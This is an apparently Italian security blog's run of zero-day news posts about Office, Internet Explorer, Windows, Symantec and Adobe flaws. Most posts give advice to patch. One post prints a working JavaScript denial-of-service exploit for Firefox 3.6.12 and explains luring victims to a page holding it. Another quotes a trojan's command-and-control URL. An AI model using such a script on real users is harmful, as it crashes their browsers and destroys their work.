Zero-Day contro PowerPoint

Ieri Microsoft ha rilasciato un bollettino di sicurezza su una vulnerabilità della tecnologia OLE.

Il bollettino parla di limitati exploit in circolazione che sfruttano PowerPoint, altri non sono così ottimisti. Sono interessate tutte le versioni a 32 bit di Microsoft Office. Attenzione che il 32 bit si riferisce alla versione di Office, non del sistema operativo, quindi un Office a 32 bit che gira su un Windows a 64 bit è vulnerabile.

Chi ha potuto esaminare l’exploit riporta che, se è attivo UAC, viene richiesto il permesso per eseguire un programma con privilegi elevati, la qual cosa dovrebbe insospettire l’utente (ma ci sono poche speranze).

Microsoft ha rilasciato anche un QuickFix in attesa della patch definitiva via Windows Update, a testimonianza del fatto che la diffusione dell’exploit potrebbe non essere così limitata.

Il consiglio è di installare quanto prima il QuickFix e di non aprire allegati di documenti Office (PowerPoint, Word, Excel) che provengono da fonti sconosciute, specialmente se contenuti in file compressi (ZIP).

Zero Day in Symantec Endpoint Protection

I ricercatori di Offensive Security hanno scoperto alcune vulnerabilità in Symantec Endpoint Protection.

Per il momento l’organizzazione ha deciso di non pubblicare il codice per sfruttare queste vulnerabilità, ma si è limitata a pubblicare un video dove si vede un Windows 7 32 bit SP1 aggiornato con installato l’ultima versione 12.1.4100.4126 aggiornata del software di Symantec in cui un utente non privilegiato esegue uno script in Python per guadagnare il privilegio di SYSTEM.

Symantec è al corrente del problema e sta investigando. Non ci sono notizie per ora di programmi che possano sfruttare questa vulnerabilità per attaccare un computer.

Un problema in un software di questo tipo è molto serio, per di più Symantec Endpoint Protection è molto utilizzato anche nelle grosse organizzazioni.

Il consiglio che vale per tutti, indipendentemente dall’antivirus installato, è che un software di protezione non garantisce l’immunità completa, sia per la grande varietà di malware in circolazione, sia per l’ovvia regola che esce prima il virus della definizione dell’antivirus. (via ISC)

Security Focus ha assegnato al problema l’ID 68946.


Aggiornamenti dopo la pubblicazione iniziale

  • Aggiunto link all’articolo di Security Focus

 

MSIE + Flash = 0-Day

Nuovo Zero-Day di Internet Explorer con installato il plugin di Adobe Flash.

Secondo Microsoft stessa la vulnerabilità interessa tutte le versioni del browser dalla 6 alla 11 incluse, anche se lo 0-day che è stato analizzato (ma non è detto che non ne esistano altri) colpisce solamente le versioni dalla 9 alla 11 incluse.

La vulnerabilità in questione permette all’attaccante di eseguire codice arbitrario sul computer della vittima (remote code execution) bypassando ogni tipo di protezione sia se viene utilizzato Internet Explorer come browser sia se viene utilizzato per visualizzare i contenuti HTML all’interno di altri programmi, come Outlook. Leggi tutto “MSIE + Flash = 0-Day”

Zero Day per Windows XP e Server 2003

FireEye ha scoperto un malware che sfrutta una vulnerabilità non ancora corretta del kernel di Windows XP e Winodws Server 2003 che permette un guadagno locale di privilegi.

Se questa vulnerabilità non permette direttamente di eseguire del codice da remoto, consente comunque di eseguire del codice con privilegi elevati.

Esiste un documento PDF che sfrutta questa vulnerabilità assieme alla versioni di Acrobat Reader 9.5.4, 10.1.6, 11.0.2 e inferiori; il PDF esegue uno script shell che crea un eseguibile in una directory temporanea e lo esegue. Rer queste versioni di Acrobat reader esiste già un bollettino tecnico e una relativa patch.

Microsoft ha rilasciato un bollettino tecnico che spiega anche come impedire che questa vulnerabilità venga sfruttata, ma al costo di disabilitare i servizi che si basano sulle API di  Windows Telephony (TAPI), tra cui il Remote Access Service (RAS) e le VPN.

È verosimile che molti malviventi (e organizzazioni assimilate) che sfruttano le vulnerabilità dei sistemi per scopi illegali stiano aspettando la fine del supporto di Windows XP per utilizzare questi e altri bachi del sistema operativo. Ad oggi basta pazientare solamente per 131 giorni. (via ISC)

Un altro zero-day per Internet Explorer

Questa storia rischia di diventare una rubrica settimanale.

FireEye Labs ha scoperto un nuovo zero-day di Internet Explorer. Si tratta di un attacco ROP portato al programma quando questo verifica la data dell’header PE di msvcrt.dll. Se l’attacco va a buon fine, il malware può eseguire codice arbitrario sul computer della vittima (remote code execution).

Il campione di malware esaminato da FireEye è destinato a Windows XP e 7 con Internet Explorer 7 e 8 versione inglese. Tuttavia la vulnerabilità esiste in tutte le versioni di Internet Explorer e il malware può essere facilmente modificato per attaccare altre versioni e altre localizzazioni del software.

Non sono disponibili patch per questo problema, l’unica soluzione è evitare di utilizzare Internet Explorer oppure installare e configurare Microsoft EMET. (via ISC)

Aggiornamento 12/11/2013 – Questo baco verrà corretto con il patch tuesday di oggi.

Prodotti Microsoft vulnerabili ai file TIFF

TIFFAlcuni prodotti Microsoft sono sensibili ad un attacco portato attraverso file grafici TIFF.

Questo formato è sconosciuto ai più, ma ha una certa diffusione nel campo della grafica e assimilati: la regola generale è che se non l’avete mai sentito nominare è perché non avete mai avuto bisogno di utilizzarlo.

Tuttavia è possibile attaccare una vittima inducendola ad aprire un file di Office che contiene un’immagine TIFF creata ad arte. Se viene aperto un file di questo tipo con un programma vulnerabile l’attaccante può eseguire dei programmi arbitrari sul computer della vittima (remote code execution).

I programmi interessati sono:

  • Office 2003
  • Office 2007
  • Office 2010 (solamente se gira su Windows XP oppure Windows Server 2003)
  • Lync

Questa vulnerabilità viene già sfruttata attraverso mail con allegati creati ad arte che, se aperti, possono eseguire programmi sul computer della vittima.

Per ora non sono annunciate delle patch, Microsoft ha diramato un bollettino di sicurezza in cui viene spiegato come disabilitare il codec del formato TIFF. Chi non vuole smanettare troppo con la configurazione di Windows può delegare l’attività all’apposito Fix it. (via ISC)

Aggiornamento 7/11/2013 – Ovviamente la diffusione dei vari exploit di questo baco è maggiore di quella ritenuta all’inizio. Prestate particolare attenzione a delle mail con allegati Word (DOC o DOCX).

Aggiornamento 6/12/2013 – Microsoft ha annunciato che il problema verrà risolto nel patch tuesday di dicembre 2013.

Zero-day per Internet Explorer (con fix)

Microsoft ha rivelato l’esistenza di uno zero-day per Internet Explorer.

Secondo i ricercatori di Qualys, per il momento gli attacchi sarebbero geograficamente limitati all’area del Giappone, ma potrebbero diffondersi una volta che è stato rivelato il problema.

La vulnerabilità scoperta permette di eseguire dei programmi arbitrari sul computer della vittima (remote code execution) inducendola a visitare un sito opportunamente creato per sfruttare il baco.

Tutte le versioni attualmente supportate di Internet Explorer sono interessate da questo problema.

La vulnerabilità è provocata da un componente di Microsoft Office che non è stato compilato con la funzionalità della randomizzazione dello spazio degli indirizzi (ALSR).

Microsoft ha già rilasciato un Fix it per correggere il problema che può essere applicato per le versioni di Exlorer dalla 6 alla 11 incluse. (via Threat Post)

Aggiornamento 2/10/2013 – Microsoft ha assegnato il codice 2887505 a questo problema.

Aggiornamento 4/10/2013 – Microsoft corregge questo problema con il patch tuesday di ottobre.

Vulnerabilità per Internet Explorer 6, 7 e 8

Blocked windowMicrosoft ha diramato il Security Advisory 2794220 che documenta una vulnerabilità delle versioni di Internet Explorer fino alla 8 inclusa.

La vulnerabilità, già sfruttata da alcuni attacchi, permette ad un malintenzionato di eseguire programmi arbitrari sul computer della vittima (remote code execution).

Chi ha Windows Vista o Windows 7 dovrebbe installare Internet Explorer 9. Purtroppo per loro, gli utenti che hanno Windows XP restano per ora vulnerabili, finché non viene pubblicata una patch.

Tra i fattori mitiganti citati da Microsoft ci sono l’attivazione della enhanced security sui server, ma la nota tecnica dice che questa funzione mitiga il problema, non dice che lo evita. (via Slashdot)

Aggiornamento 1/1/2013 – Microsoft ha reso disponibile un FixIt per sistemare il problema in attesa di una patch.

Aggiornamento 5/1/2013Exodus Intelligence è riuscita a bypassare la patch di FixIt e a compromettere un sistema patchato. (via ISC)

Pericolosa vulnerabilità di Internet Explorer

Lo scorso lunedì è stata diramata la notizia di uno zero day che colpisce tutte le versioni di Internet Explorer fino alla 9 inclusa.

La vulnerabilità del browser permette di eseguire un programma arbitrario sul computer della vittima attraverso un heap spray se questa visita un sito con una pagina creata allo scopo.

Anche il famoso tool Metasploit dispone già di un modulo per sfruttare questo baco.

Microsoft ha rilasciato un FixIt per sistemare il problema immediatamente. Domani 21 settembre verrà rilasciata una patch fuori banda attraverso il canale degli aggiornamenti automatici.

Anatomia di un attacco

Thames and fog / Tamigi e nebbiaGli 0-day dei software, specialmente quelli molto diffusi, non valgono nemmeno più la pena di essere citati tutti.

Quello scoperto da poco in Adobe Reader è interessante per come è stato sfruttato. Purtroppo la scansione degli eventi che segue potrebbe essere falsata dalle differenze di fusi orari, ma per ora dobbiamo convivere con questa maledizione. 🙂

Adobe ha diramato il bollettino di sicurezza il 6 dicembre avvisando di un problema critico alle versioni 10 e 9 del Reader (quelle precedenti non sono più supportate e non dovrebbero essere utilizzate). La data è probabilmente riferita ad uno dei fusi orari americani.

Il 7 dicembre verso le 21:00 CET Mikko Hypponen twitta la notizia del ritrovamento di un PDF che sfrutta la vulnerabilità.

Un’ora dopo Mikko twitta che quel PDF è stati utilizzato per attaccare Mantech, un fornitore della Difesa americana. Subito dopo un altro utente aggiunge che l’attacco a mezzo PDF colpirebbe più fornitori della Difesa. A stretto giro di twit Mikko rivela che il PDF con cui è stata attaccata Mantech si chiama ManTech Employee Satisfaction Survey.pdf, rivelando un ovvio sfruttamento di una tecnica di social engineering paragonabile a quella utilizzata per attaccare RSA.

Contagio pubblica un’analisi di questo exploit da cui si vede che il finto PDF tenta di installare una copia di Sykipot; il trojan tenta quindi di effettuare un collegamento https verso l’URL www.prettylikeher.com/asp/kys_allow_get.asp?name=getkys.kys

Al momento in cui sto scrivendo la pagina non esiste più, ma https://www.prettylikeher.com contiene ancora una copia piuttosto sgangherata di una pagina di Yahoo!

Leggi tutto “Anatomia di un attacco”

Duqu sfrutta uno 0-day del kernel di Windows

da "The Hacker News"

Il  Laboratory of Cryptography and System Security (CrySyS) ungherese ha scoperto che la routine di installazione di Duqu sfrutta una vulnerabilità non corretta del kernel di Windows.

Duqu utilizza un documento Word creato ad arte che riesce a caricare un driver del kernel sfruttando un baco non corretto; il driver carica, quindi, una DLL in Services.exe per avviare l’installazione di Duqu nel computer vittima dell’attacco. La compilazione del driver secondo l’header PE sarebbe avvenuta il 21/02/2008 alle 06:14:47.

La vulnerabilità non è di Word, ma del kernel, quindi questo vettore di attacco potrebbe essere sfruttato in altri modi, finché Microsoft non decide di correggere questo problema.

Secondo un’analisi di McAfee, il sistema appena descritto sarebbe già stato presente in Stuxnet.

Sophos riporta che Microsoft sta lavorando per correggere il problema del kernel. Sempre secondo Redmond [PDF], il loro sistema di pulizia dal malware non residente (il Malicious Software Removal Tool distribuito ogni mese con Windows Update) non ha rilevato alcun 0-day, ma sono dati che lasciano il tempo che trovano, in quanto il tool non è aggiornato come gli antivirus residenti e viene spesso ignorato dagli utenti.

Sulle tracce di Stuxnet

Stuxnet è un malware al momento unico nel suo genere. Non si affida a Internet per la diffusione. È enorme. La sua modalità di attacco primaria è il sabotaggio fisico dell’hardware industriale. È stato (presumibilmente) sviluppato da un governo ostile. È mirato a una ben precisa installazione. Chi lo ha sviluppato ha dimostrato di avere una conoscenza intima della struttura interna del bersaglio. Fa parte di un assalto “multidisciplinare” (o almeno così parrebbe). Leggi tutto “Sulle tracce di Stuxnet”

Guadagno di privilegi su quasi tutti i sistemi windows

ATTENZIONE! NON fate test di buffer overflow del kernel su macchina di produzione o similari. I risultati sono IMPREVEDIBILI.

p0wnbox ha pubblicato un exploit di una vulnerabilità del kernel di Windows (file win32k.sys) colpirebbe tutti i sistemi Windows.

In questo caso viene sfruttato un problema strutturale della funzione RtlQueryRegistryValues delle API di Windows utilizzata per leggere più voci del registry con una sola chiamata. Le voci da interrogare vengono passate tramite una struttura uno dei cui campi, EntryContext, contiene un puntatore al buffer in cui mettere i risultati della voce relativa (si può specificare un buffer separato per ciascuna voce da interrogare). Leggi tutto “Guadagno di privilegi su quasi tutti i sistemi windows”

0day di Mozilla Firefox 3.6.12

<!--

0day Mozilla Firefox <= 3.6.12 Remote Denial Of Service

Credits:
Emanuele 'emgent' Gentili	<emgent@backtrack-linux.org>
Marco 'white_sheep' Rondini	<white_sheep@backtrack-linux.org>
Alessandro 'scox' Scoscia	<scox@backtrack.it>

-->

<script>document.write("\u0000\u0001\u0002\u0003\u0004\u0005")</script>

<script>
var i=0;
for (i=0;i<=19999;i++)
{
document.write("a");
}

for (i=0;i<=3;i++)
{
document.write(document.body.innerHTML);
}

</script>


Il simpatico script qui sopra blocca l’ultima versione di Mozilla Firefox, indipendentemente dal sistema operativo su cui gira.

Basta, quindi, inserirlo in una pagina HTML, indurre qualcuno a visitare quella pagina e voilà gli avete bloccato Firefox, costringendolo a chiudere brutalmente il software e a perdere i riferimenti a tutti i tab aperti (ci sono persone che potrebbero uccidere per una perdita del genere attenzione!).

Per ora si tratta solamente di un denial of service, non sono (ancora?) noti malware che sfruttano questo problema per altri scopi.

Il problema è stato scoperto dal gruppo italiano Backtrack.

Aggiornamento per Acrobat

Dopo quasi un mese dalla diffusione di  uno 0-day, Adobe rilascia finalmente un aggiornamento per il suo reader PDF, le cui versioni attuali diventano 9.4 e 8.2.5; le versioni precedenti non sono più supportate e dovrebbero essere aggiornate quanto prima.

Se non si verificano altre emergenze, il prossimo aggiornamento del software è previsto per l’8 febbraio 2011.

Problema di sicurezza di Adobe Acrobat Reader

Sta circolando almeno un documento PDF che sfrutta un problema 0-day di Acrobat Reader. Anche Adobe ha diramato un bollettino di sicurezza in cui classifica questo problema come critico.

Tutte le versioni per tutte le piattaforme di Acrobat Reader presentano questo problema, nessuno escluso.

In questo momento non ci sono azioni che possono risolvere questo problema, Adobe sta lavorando  per correggere l’errore e rilascerà probabilmente un aggiornamento quanto prima.

Alcune mail che contengono il documento infetto che sfrutta questa vulnerabilità hanno come oggetto David Leadbetter’s One Point Lesson. Alcuni attacchi portati con questo vettore chiudono forzatamente Acrobat Reader e tentano di aprire un programma che fa da esca per l’utente.

Alcuni antivirus riescono a classificare i PDF che sfruttano questa vulnerabilità  come sospetti; tuttavia è buona regola non aprire PDF di provenienza ignota con Acrobat Reader.